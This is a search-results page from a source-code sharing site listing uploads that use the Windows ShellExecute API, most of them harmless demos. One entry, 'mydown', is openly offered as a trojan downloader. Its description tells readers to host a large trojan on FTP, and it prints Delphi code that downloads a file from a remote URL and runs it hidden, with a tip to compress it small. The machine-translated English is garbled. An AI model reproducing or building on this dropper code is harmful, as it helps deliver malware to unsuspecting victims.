CodeBus
www.codebus.net
Search
Sign in
Sign up
Hot Search :
Source
embeded
web
remote control
p2p
game
More...
Location :
Home
Search - ShellExecute
Main Category
SourceCode
Documents
Books
WEB Code
Develop Tools
Other resource
Search - ShellExecute - List
[
Windows Develop
]
深入浅出ShellExecute
DL : 1
深入浅出ShellExecute -Explain the profound things of Shell Execute.
Update
: 2008-10-13
Size
: 1.88kb
Publisher
:
吴汉
[
File Operate
]
TestOld
DL : 0
这是利用ShellExecute来执行程序,也涉及到文件的一些操作-This is the use of ShellExecute to implement procedures, but also to document the operation
Update
: 2025-02-17
Size
: 38kb
Publisher
:
[
Internet-Network
]
mydown
DL : 0
执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadFile(SourceFile, DestFile: string): Boolean begin GetMem(u,100) GetMem(l,100) u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址 l:= c:/downpage.txt //改为你要存放并打开文件的路径 try Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0 except Result := False end end begin if DownloadFile(u, l) then begin ShellExecute(0, PChar( open ), PChar(l), PChar( ), nil, 0) end //freemem(u) //freemem(l) end. 先试一下。。。。 ok, 明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R*. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http :// www.jm-my.com/ip2.txt// read you want to download the website l : = c :/downpage.txt// read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
Update
: 2025-02-17
Size
: 1kb
Publisher
:
韩冰
[
Communication
]
Simple_email_transmiter
DL : 0
该程序制作了一个简单的E-MAIL发送器,在VC中可以用ShellExecute函数简单的调用默认的电子邮件程序。-The procedure produced a simple E-MAIL transmitter in the VC can be simple to use ShellExecute function call the default email program.
Update
: 2025-02-17
Size
: 10kb
Publisher
:
徐亮
[
OS program
]
try
DL : 0
本例是一个用ShellExecute函数调用相应文档的一个例子,非常简单,自己可以照例添加自己的句子进去。-This case is a ShellExecute function call with an example of the corresponding documents, is very simple, they can add your own sentence, as usual, go.
Update
: 2025-02-17
Size
: 2.21mb
Publisher
:
zj
[
Software Engineering
]
WinExecShellExecute
DL : 0
在for DOS的C语言中,有一个system()函数,其功能是执行命令行程序,在VB中也有shell()函数,在Windows程序设计中WinAPI也为我们提供了类似的函数,它们就是WinExec()和ShellExecute(),下面就来讨论一下这两个函数的用法。 -In the C language for DOS, there is a system () function, and its function is to implement command-line program, in VB also shell () function in Windows programming WinAPI also provides us with a similar function, they are WinExec () and ShellExecute (), following on to discuss the usage of these two functions.
Update
: 2025-02-17
Size
: 5kb
Publisher
:
lijing
[
Other systems
]
VBQQ
DL : 0
用VB做QQ强制聊天器 用VB做QQ强制聊天器 大家好..我是愚罪..QQ:303931726 今天教大家来用VB做QQ强制聊天器..... 废话不多说了``` 直接打开VB 新建一个EXE文件..新建一个Text和一个Command按纽 最后直接把代码写上去就可以了... Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _ (ByVal hwnd As Long, _ ByVal lpOperation As String, _ ByVal lpFile As String, _ ByVal lpParameters As String, _ ByVal lpDirectory As String, _ ByVal nShowCmd As Long) As Long Private Sub Command1_Click() ShellExecute 0, "open", "tencent://message/?uin=" + Text1.Text, "", "", 1 End Sub 可以了...生成试验下..我就不美化了..你们可以去美化下``` 看。。成功了-QQ forced to use VB to do so VB uses QQ chat chat mandatory browser everyone .. I was stupid crime .. QQ: 303931726 today teach everyone to use VB to do QQ chat browser mandatory nonsense ..... nothing to add to that `` ` VB directly open a new EXE file .. create a new Text and a Command button code to write directly to the final you can go ... Private Declare Function ShellExecute Lib shell32.dll Alias ShellExecuteA _ (ByVal hwnd As Long, _ ByVal lpOperation As String, _ ByVal lpFile As String, _ ByVal lpParameters As String, _ ByVal lpDirectory As String, _ ByVal nShowCmd As Long) As LongPrivate Sub Command1_Click () ShellExecute 0, open , tencent:// message/? uin =+ Text1.Text, , , 1End Sub can test the next generation ... .. I do not glorify .. you can go to see ``` under landscaping. . Successful
Update
: 2025-02-17
Size
: 1kb
Publisher
:
好感觉
[
Hook api
]
ShellExecute
DL : 0
ShellExecute的使用技巧演示!-The use of ShellExecute presentation skills!
Update
: 2025-02-17
Size
: 1.79mb
Publisher
:
shingpha
[
Windows Develop
]
Quick_Launch
DL : 0
在编程运用了众多的编程小功能: 1、ToolTip 鼠标移动到一个按钮上时,自动弹出一些提示,本程序采用了XInfoTip; 2、Mouse 在程序添加了动态鼠标功能; 3、Icon 软件不采用VC6.0的默认图标; 4、托盘显示与软件界面前端显示; 5、使用ShellExecute()函数调用其他程序。-Use in programming a wide range of programming a small function: 1, ToolTip to a mouse button, the automatic pop-up some tips, the procedures used XInfoTip 2, Mouse in the process added a dynamic mouse function 3, Icon software do not use the default icon VC6.0 4, pallet display and software interface front-end display 5, using the ShellExecute () function call other programs.
Update
: 2025-02-17
Size
: 176kb
Publisher
:
Liu
[
Windows Develop
]
MpcController
DL : 0
简单的API函数CreateToolhelp32Snapshot ShellExecute PostMessage 用法 VS2005 C-CreateToolhelp32Snapshot ShellExecute PostMessage about some API method in VS2005 C++
Update
: 2025-02-17
Size
: 1kb
Publisher
:
林齐
[
OS program
]
CreateProcessMFC
DL : 0
分别用CreateProcess()和ShellExecute()实现打开新的应用程序,并在规定时间内关掉进程。-Were treated with CreateProcess () and ShellExecute () the realization of new applications to open and turn off the process of the time.
Update
: 2025-02-17
Size
: 45kb
Publisher
:
逍遥客
[
Windows Develop
]
test
DL : 0
Run exe by shellExecute
Update
: 2025-02-17
Size
: 24kb
Publisher
:
air
[
Audio program
]
AudioCDDlg
DL : 0
Auto-Run to media files or already playlist file you had one by using ShellExecute API for OSMSWindowsX
Update
: 2025-02-17
Size
: 2kb
Publisher
:
hakanbul
[
Other
]
CreateProcess
DL : 0
CreateProcess,WinExec,ShellExecute 三种打开进程的函数使用例子-CreateProcess, WinExec, ShellExecute function of the use of three examples of open process
Update
: 2025-02-17
Size
: 65kb
Publisher
:
daiafei
[
Delphi VCL
]
execute
DL : 0
ExecuteFile(FileName: string) filename complete path plus parameters win32 api function ShellExecute-ExecuteFile(FileName: string) filename complete path plus parameters win32 api function ShellExecute
Update
: 2025-02-17
Size
: 7kb
Publisher
:
batlerboy
[
Windows Develop
]
WinAPI-ShellExecute
DL : 0
WinAPI ShellExecute调用文件-WinAPI ShellExecute call file
Update
: 2025-02-17
Size
: 6kb
Publisher
:
李澈
[
OS program
]
ShellExecute
DL : 0
C程序调用ShellExecute函数打开发邮件的OutLook程序,编译成功后会生成一个命令提示符可执行程序,打开后显示:确认打开邮件收发程序!(Y/N),如果选择Y,则调用Windows系统的OutLook程序,进行邮件发送,向读者演示如何在C语言中调用ShellExecute函数。-C program calls the ShellExecute function is to fight the development OutLook mail program, compiled after the success of a command prompt will generate an executable program, opened shows: Open the mail delivery confirmation procedure! (Y/N), if you select Y, then call the Windows system OutLook procedures, mail, shows the reader how to call the ShellExecute function in C language.
Update
: 2025-02-17
Size
: 2kb
Publisher
:
张名
[
VC/MFC
]
ShellExecute
DL : 0
Sample code for ShellExecute
Update
: 2025-02-17
Size
: 777kb
Publisher
:
jonathan.araneda
[
Delphi VCL
]
shellExecute
DL : 0
WindowAPI应用一例,用ShellExecute打开本机中指定的目录。-WindowAPI application one example, use ShellExecute to open the machine in the specified directory.
Update
: 2025-02-17
Size
: 13kb
Publisher
:
jf
[
Shell api
]
ShellExecute
DL : 0
this to implement shellexecute function -this is to implement shellexecute function
Update
: 2025-02-17
Size
: 31kb
Publisher
:
funpro
«
1
2
3
»
CodeBus
is one of the largest source code repositories on the Internet!
Contact us :
1999-2046
CodeBus
All Rights Reserved.